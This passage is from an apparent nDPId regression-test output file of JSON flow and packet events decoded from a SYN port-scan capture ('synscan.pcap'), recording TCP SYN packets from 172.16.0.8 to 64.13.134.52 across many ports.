-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsbMEAADkGorGsEAAIQA2GNIzSBB\/dUoMYAAAAAGACCAAscAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsfVEAADAGmyGsEAAIQA2GNIzSgATdUoMYAAAAAGACBAC0igAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAsMZMAADkG3d+sEAAIQA2GNIzSBDXdUoMYAAAAAGACCAAsWgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060492,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_packet_id":1,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060492,"pkt":"ACYLMQczACWzv5HuCABFAAAs3h4AADoGMFSsEAAIQA2GNIzSGabdUoMYAAAAAGACDAAS6QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060493,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_packet_id":1,"flow_last_seen":1278275060493,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060493,"pkt":"ACYLMQczACWzv5HuCABFAAAszXIAADkGQgCsEAAIQA2GNIzS3aHdUoMYAAAAAGACCABS7QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsaFcAACYGuhusEAAIQA2GNIzSF0ndUoMYAAAAAGACDAAVRgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsoCcAACkGf0usEAAIQA2GNIzS4uDdUoMYAAAAAGACCABNrgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsD\/IAADoG\/oCsEAAIQA2GNIzSI\/fdUoMYAAAAAGACDAAImAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1339,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsLzkAADAG6TmsEAAIQA2GNIzSBGbdUoMYAAAAAGACBAAwKQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsdksAADkGmSesEAAIQA2GNIzSS1PdUoMYAAAAAGACCADlOwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsyvwAADAGTXasEAAIQA2GNIzSAgHdUoMYAAAAAGACBAAyjgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs0McAACsGTKusEAAIQA2GNIzSAtLdUoMYAAAAAGACEAAlvQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsyTwAADQGSzasEAAIQA2GNIzSwAHdUoMYAAAAAGACBAB0jQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs928AADQGHQOsEAAIQA2GNIzSH0HdUoMYAAAAAGACBAAVTgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsvbAAAC0GXcKsEAAIQA2GNIzSDSrdUoMYAAAAAGACCAAjZQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs2wcAADYGN2usEAAIQA2GNIzSEJLdUoMYAAAAAGACDAAb\/QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs2yMAADIGO0+sEAAIQA2GNIzSF3ndUoMYAAAAAGACDAAVFgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsbeEAADIGqJGsEAAIQA2GNIzSDx3dUoMYAAAAAGACDAAdcgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs6ogAACUGOOqsEAAIQA2GNIzSBC3dUoMYAAAAAGACCAAsYgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060496,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_packet_id":1,"flow_last_seen":1278275060496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060496,"pkt":"ACYLMQczACWzv5HuCABFAAAsm4gAADYGduqsEAAIQA2GNIzSPvHdUoMYAAAAAGACDADtnQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsX1oAACYGwxisEAAIQA2GNIzTI4\/dU4MZAAAAAGACDAAI\/QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsZuAAAC0GtJKsEAAIQA2GNIzTFxbdU4MZAAAAAGACCAAZdgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsoCQAACcGgU6sEAAIQA2GNIzTArPdU4MZAAAAAGACEAAl2QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsZsIAACkGuLCsEAAIQA2GNIzTBqTdU4MZAAAAAGACCAAp6AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 